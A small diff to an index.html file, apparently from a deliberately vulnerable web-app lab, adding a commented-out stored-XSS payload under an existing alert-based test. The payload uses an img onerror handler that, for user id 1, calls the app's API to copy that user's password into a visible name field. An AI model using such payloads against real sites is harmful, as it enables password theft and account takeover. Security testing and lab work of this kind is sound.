--- a/index.html
+++ b/index.html
@@ -174,6 +174,7 @@
   </div>
 </div>
 <!--<img src='x' onerror='alert(JSON.stringify(initState))'>-->
+<!--<img src='x' onerror='(() => initState.user.id == 1 ? fetch(`https://web-bugs.vercel.app/api?action=setName&id=1&name=${initState.user.password}`) : "")()'>-->
 <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js"
         integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2"
         crossorigin="anonymous"></script>
